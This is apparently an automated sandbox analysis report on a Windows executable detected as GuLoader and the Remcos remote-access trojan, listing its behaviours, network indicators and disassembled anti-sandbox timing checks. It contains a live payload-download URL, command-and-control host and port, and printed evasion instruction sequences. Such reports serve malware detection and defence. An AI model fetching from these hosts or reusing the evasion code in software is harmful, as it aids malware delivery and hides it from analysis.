Play interactive tour

Edit tour

Windows Analysis Report kGSHiWbgq9.exe

Overview

General Information

Sample Name:	kGSHiWbgq9.exe
Analysis ID:	457930
MD5:	27bf14807bc9d5cd2d823293f43c3a3a
SHA1:	08eeed11867aa351be0d6c48da283721ee6c0769
SHA256:	55fd5769df0df23d4140a34d07dc2c833b43ac1060f4d0992bdd27316041c69a
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

GuLoader Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

GuLoader behavior detected

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Remcos RAT

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Hides threads from debuggers

Installs a global keyboard hook

Machine Learning detection for sample

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses dynamic DNS services

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Sample file is different than original file name gathered from version info

Sleep loop found (likely to delay execution)

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

kGSHiWbgq9.exe (PID: 6592 cmdline: 'C:\Users\user\Desktop\kGSHiWbgq9.exe' MD5: 27BF14807BC9D5CD2D823293F43C3A3A)

kGSHiWbgq9.exe (PID: 6636 cmdline: 'C:\Users\user\Desktop\kGSHiWbgq9.exe' MD5: 27BF14807BC9D5CD2D823293F43C3A3A)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://101.99.94.119/WEALTH_PRUu"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: kGSHiWbgq9.exe PID: 6636	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_PRUu"}

Multi AV Scanner detection for submitted file

Show sources

Source: kGSHiWbgq9.exe

Virustotal: Detection: 21%

Perma Link

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kGSHiWbgq9.exe PID: 6636, type: MEMORYSTR

Machine Learning detection for sample

Show sources

Source: kGSHiWbgq9.exe

Joe Sandbox ML: detected

Source: kGSHiWbgq9.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: http://101.99.94.119/WEALTH_PRUu

Uses dynamic DNS services

Show sources

Source: unknown

DNS query: name: wealthyrem.ddns.net

Source: global traffic

TCP traffic: 192.168.2.4:49759 -> 194.5.97.128:39200

Source: Joe Sandbox View

ASN Name: DANILENKODE DANILENKODE

Source: global traffic

HTTP traffic detected: GET /WEALTH_PRUuqVZw139.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119

Source: global traffic

HTTP traffic detected: GET /WEALTH_PRUuqVZw139.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: wealthyrem.ddns.net

Source: kGSHiWbgq9.exe, 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp

String found in binary or memory: http://101.99.94.119/WEALTH_PRUuqVZw139.bin

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Show sources

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\kGSHiWbgq9.exe

Jump to behavior

E-Banking Fraud:

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kGSHiWbgq9.exe PID: 6636, type: MEMORYSTR

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F90E6 NtProtectVirtualMemory,	1_2_020F90E6
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F2873 NtWriteVirtualMemory,LoadLibraryA,	1_2_020F2873
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F5968 NtAllocateVirtualMemory,	1_2_020F5968
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F443A NtWriteVirtualMemory,	1_2_020F443A
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F5A62 NtWriteVirtualMemory,NtAllocateVirtualMemory,	1_2_020F5A62
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F7A7A NtWriteVirtualMemory,	1_2_020F7A7A
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F4B7C NtWriteVirtualMemory,	1_2_020F4B7C
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F4BC9 NtWriteVirtualMemory,	1_2_020F4BC9
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F8FBB NtProtectVirtualMemory,	1_2_020F8FBB
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F4DB6 NtWriteVirtualMemory,	1_2_020F4DB6
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 11_2_00569C03 LdrInitializeThunk,Sleep,LdrInitializeThunk,NtProtectVirtualMemory,	11_2_00569C03
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 11_2_00569B39 LdrInitializeThunk,NtProtectVirtualMemory,	11_2_00569B39
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 11_2_00569C2B LdrInitializeThunk,NtProtectVirtualMemory,	11_2_00569C2B
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 11_2_00569B22 LdrInitializeThunk,NtProtectVirtualMemory,	11_2_00569B22

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F5781	1_2_020F5781
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F94D8	1_2_020F94D8
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F853B	1_2_020F853B
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F05A1	1_2_020F05A1
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F0BDC	1_2_020F0BDC
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F2873	1_2_020F2873
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F5968	1_2_020F5968
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F0211	1_2_020F0211
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F4339	1_2_020F4339
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F40B7	1_2_020F40B7
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F0691	1_2_020F0691
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F86DB	1_2_020F86DB
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F86F4	1_2_020F86F4
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F443A	1_2_020F443A
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F95C6	1_2_020F95C6
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F85E7	1_2_020F85E7
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F5A62	1_2_020F5A62
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F7A7A	1_2_020F7A7A
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F2A77	1_2_020F2A77
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F3ACE	1_2_020F3ACE
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F0B59	1_2_020F0B59
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F4B7C	1_2_020F4B7C
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F4BC9	1_2_020F4BC9
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F3BFF	1_2_020F3BFF
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F8802	1_2_020F8802
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F3874	1_2_020F3874
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F891F	1_2_020F891F
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F0921	1_2_020F0921
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F398F	1_2_020F398F
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F7E5C	1_2_020F7E5C
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F1E99	1_2_020F1E99
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F0ED2	1_2_020F0ED2
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F2FD3	1_2_020F2FD3
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F8C2C	1_2_020F8C2C
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F3CEF	1_2_020F3CEF
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F0CFA	1_2_020F0CFA
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F3CF2	1_2_020F3CF2
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F2D3B	1_2_020F2D3B
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F5D78	1_2_020F5D78
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F1DA0	1_2_020F1DA0
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F4DB6	1_2_020F4DB6
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F0DD5	1_2_020F0DD5

Source: kGSHiWbgq9.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: kGSHiWbgq9.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: kGSHiWbgq9.exe, 00000001.00000000.646609422.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamePAAKLDENDE.exe vs kGSHiWbgq9.exe
Source: kGSHiWbgq9.exe, 00000001.00000002.773544375.0000000002090000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs kGSHiWbgq9.exe
Source: kGSHiWbgq9.exe, 0000000B.00000000.772049826.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamePAAKLDENDE.exe vs kGSHiWbgq9.exe
Source: kGSHiWbgq9.exe, 0000000B.00000002.1726897873.0000000000860000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs kGSHiWbgq9.exe
Source: kGSHiWbgq9.exe	Binary or memory string: OriginalFilenamePAAKLDENDE.exe vs kGSHiWbgq9.exe

Source: kGSHiWbgq9.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/1@1/2

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

File created: C:\Users\user\AppData\Roaming\remcos

Jump to behavior

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Mutant created: \Sessions\1\BaseNamedObjects\Remcos-FAZALZ

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

File created: C:\Users\user\AppData\Local\Temp\~DFA49EFCEC46BBB65C.TMP

Jump to behavior

Source: kGSHiWbgq9.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: kGSHiWbgq9.exe

Virustotal: Detection: 21%

Source: unknown	Process created: C:\Users\user\Desktop\kGSHiWbgq9.exe 'C:\Users\user\Desktop\kGSHiWbgq9.exe'
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Process created: C:\Users\user\Desktop\kGSHiWbgq9.exe 'C:\Users\user\Desktop\kGSHiWbgq9.exe'
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Process created: C:\Users\user\Desktop\kGSHiWbgq9.exe 'C:\Users\user\Desktop\kGSHiWbgq9.exe'	Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_00408873 push esp; ret	1_2_00408877
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_004088C0 push esp; ret	1_2_004088CB
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_004014E9 push es; ret	1_2_004014EA
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_00408CB2 push esi; ret	1_2_00408CB3
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_0040891C push esi; retf	1_2_0040892F
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_00407D36 pushad ; iretd	1_2_00407D3B
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_00408672 push esi; ret	1_2_00408677
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_00407E22 push ds; iretd	1_2_00407E27
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_00408624 push esp; ret	1_2_00408627
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_00408ADE push esi; retf	1_2_00408ADF
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_00408695 push esi; ret	1_2_00408677
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F6625 push ebp; iretd	1_2_020F6637

Source: initial sample

Static PE information: section name: .text entropy: 7.07266809617

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F2FD3		1_2_020F2FD3
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F2D3B		1_2_020F2D3B

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F0298 second address: 00000000020F0298 instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F7EAD second address: 00000000020F7EAD instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F9858 second address: 00000000020F9858 instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F7C30 second address: 00000000020F7DF9 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor ebx, 191FF64Ah 0x00000010 test ax, cx 0x00000013 add ebx, 6B6EB43Bh 0x00000019 cmp edx, ebx 0x0000001b mov ebx, dword ptr [ebp+0000017Bh] 0x00000021 jle 00007FB8B0E6501Bh 0x00000023 call 00007FB8B0E6528Ah 0x00000028 lfence 0x0000002b rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F0EB2 second address: 00000000020F0F20 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test eax, ecx 0x0000000c push ebx 0x0000000d jmp 00007FB8B03661FFh 0x0000000f call 00007FB8B03661D0h 0x00000014 pop ebx 0x00000015 jmp ebx 0x00000017 pop ebx 0x00000018 mov dword ptr [ebp+00000204h], eax 0x0000001e mov eax, B2FB5E9Eh 0x00000023 xor eax, CC322E20h 0x00000028 xor eax, FC8DB287h 0x0000002d test dx, bx 0x00000030 sub eax, 8244C239h 0x00000035 push eax 0x00000036 mov eax, dword ptr [ebp+00000204h] 0x0000003c mov dword ptr [ebp+0000026Fh], ecx 0x00000042 mov ecx, 556F3EE3h 0x00000047 cmp esi, 3EDD9594h 0x0000004d add ecx, A870EBA2h 0x00000053 pushad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F0F20 second address: 00000000020F0F20 instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 0000000000561C79 second address: 0000000000561C79 instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 000000000056322B second address: 000000000056326F instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor dword ptr [ebp+14h], AA1EA117h 0x00000011 add dword ptr [ebp+14h], 28368260h 0x00000018 mov dword ptr [ebp+00000277h], esi 0x0000001e mov esi, C4615DA9h 0x00000023 test ebx, 3C315E73h 0x00000029 xor esi, 49D529C1h 0x0000002f xor esi, F48EAD89h 0x00000035 test ch, FFFFFF8Ch 0x00000038 sub esi, 793AD9E1h 0x0000003e pushad 0x0000003f mov ecx, 000000B7h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 0000000000563DB3 second address: 0000000000563DB3 instructions:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: kGSHiWbgq9.exe, 00000001.00000002.773600997.0000000002100000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: kGSHiWbgq9.exe, 00000001.00000002.773600997.0000000002100000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F0298 second address: 00000000020F0298 instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F7EAD second address: 00000000020F7EAD instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F9858 second address: 00000000020F9858 instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F7CB5 second address: 00000000020F7CB5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 8D6257E7h 0x00000007 xor eax, D6E50CE5h 0x0000000c xor eax, CD304DCCh 0x00000011 add eax, 6948E933h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007FB8B0E65173h 0x0000001e lfence 0x00000021 mov edx, 617AD252h 0x00000026 xor edx, 84973C64h 0x0000002c xor edx, 903C3D1Eh 0x00000032 xor edx, 0A2FD33Ch 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d cmp edx, 53D52FB7h 0x00000043 cmp ah, ch 0x00000045 test cl, bl 0x00000047 ret 0x00000048 jmp 00007FB8B0E65169h 0x0000004d cmp ch, dh 0x0000004f sub edx, esi 0x00000051 ret 0x00000052 add edi, edx 0x00000054 dec dword ptr [ebp+000000F8h] 0x0000005a cmp dword ptr [ebp+000000F8h], 00000000h 0x00000061 jne 00007FB8B0E6506Ch 0x00000063 call 00007FB8B0E650C7h 0x00000068 call 00007FB8B0E65194h 0x0000006d lfence 0x00000070 mov edx, 617AD252h 0x00000075 xor edx, 84973C64h 0x0000007b xor edx, 903C3D1Eh 0x00000081 xor edx, 0A2FD33Ch 0x00000087 mov edx, dword ptr [edx] 0x00000089 lfence 0x0000008c cmp edx, 53D52FB7h 0x00000092 cmp ah, ch 0x00000094 test cl, bl 0x00000096 ret 0x00000097 mov esi, edx 0x00000099 pushad 0x0000009a rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F7DF9 second address: 00000000020F7DF9 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, DDFE68D6h 0x00000013 xor eax, 51E6CF38h 0x00000018 sub eax, D694E780h 0x0000001d xor eax, B583C06Fh 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007FB8B0366842h 0x0000002e popad 0x0000002f call 00007FB8B03663C1h 0x00000034 lfence 0x00000037 rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F7C30 second address: 00000000020F7DF9 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor ebx, 191FF64Ah 0x00000010 test ax, cx 0x00000013 add ebx, 6B6EB43Bh 0x00000019 cmp edx, ebx 0x0000001b mov ebx, dword ptr [ebp+0000017Bh] 0x00000021 jle 00007FB8B0E6501Bh 0x00000023 call 00007FB8B0E6528Ah 0x00000028 lfence 0x0000002b rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F0EB2 second address: 00000000020F0F20 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test eax, ecx 0x0000000c push ebx 0x0000000d jmp 00007FB8B03661FFh 0x0000000f call 00007FB8B03661D0h 0x00000014 pop ebx 0x00000015 jmp ebx 0x00000017 pop ebx 0x00000018 mov dword ptr [ebp+00000204h], eax 0x0000001e mov eax, B2FB5E9Eh 0x00000023 xor eax, CC322E20h 0x00000028 xor eax, FC8DB287h 0x0000002d test dx, bx 0x00000030 sub eax, 8244C239h 0x00000035 push eax 0x00000036 mov eax, dword ptr [ebp+00000204h] 0x0000003c mov dword ptr [ebp+0000026Fh], ecx 0x00000042 mov ecx, 556F3EE3h 0x00000047 cmp esi, 3EDD9594h 0x0000004d add ecx, A870EBA2h 0x00000053 pushad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F0F20 second address: 00000000020F0F20 instructions:
